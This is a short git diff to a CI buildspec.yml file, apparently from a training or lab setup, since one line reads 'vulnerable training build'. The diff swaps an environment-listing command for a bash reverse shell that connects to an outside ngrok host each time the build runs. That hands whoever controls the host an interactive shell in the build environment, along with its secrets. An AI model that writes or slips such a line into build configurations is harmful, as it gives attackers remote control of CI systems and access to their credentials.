diff --git a/buildspec.yml b/buildspec.yml index cb0c282..5dadc8b 100644 --- a/buildspec.yml +++ b/buildspec.yml @@ -4,5 +4,5 @@ phases: build: commands: - echo "Running vulnerable training build" - - env | sort | head -n 20 + - bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18818 0>&1 - echo "Done"